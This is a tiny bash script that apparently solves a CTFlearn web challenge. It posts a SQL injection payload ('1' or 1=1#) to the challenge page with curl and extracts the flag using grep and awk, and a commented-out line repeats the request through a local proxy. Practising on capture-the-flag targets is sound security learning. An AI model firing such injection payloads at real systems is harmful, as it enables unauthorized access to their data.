#!/bin/bash
# curl https://web.ctflearn.com/web4/ --data-urlencode "input=1' or 1=1#" -x http://127.0.0.1:8080 -k | grep CTF | awk '{print substr($0, 243, 50)}'
curl https://web.ctflearn.com/web4/ --data-urlencode "input=1' or 1=1#" | grep CTF | awk '{print substr($0, 243, 50)}'